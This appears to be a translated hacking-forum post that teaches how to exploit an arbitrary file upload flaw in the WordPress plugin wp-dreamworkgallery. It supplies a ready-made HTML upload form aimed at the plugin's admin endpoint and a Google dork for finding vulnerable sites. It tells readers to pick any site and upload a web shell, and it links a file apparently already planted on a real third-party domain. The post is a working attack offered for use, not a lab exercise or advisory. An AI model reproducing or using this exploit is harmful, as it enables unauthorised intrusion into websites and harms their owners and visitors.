This bug allows us to comfortably UpShell via a .html file right from localhost
Join the channel Telegram of the AnonyViet 👉 Link 👈 |
https://www.youtube.com/watch?v=P_ejHXYtwY0
Step 1: Create a file Upload.html
<html> <body> <form action="http://www.web-bị-lỗi.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form> </body> </html>
Step 2: Find the wrong Web
Find the error by going to Google.com and typing the command
inurl:/wp-content/plugins/wp-dreamworkgallery/
Step 3: Choose any site
Replace the broken website link in the code in Step 1, remember to save it
Step 4: Up Shell
Open File Upload.html in Step 1 up, and Up Shell up
Note: The error after Up shell
Copy this line to the broken site Link is OK
http://www.pressprint.rs/wp-content/uploads/dreamwork/334_uploadfolder/big/1.html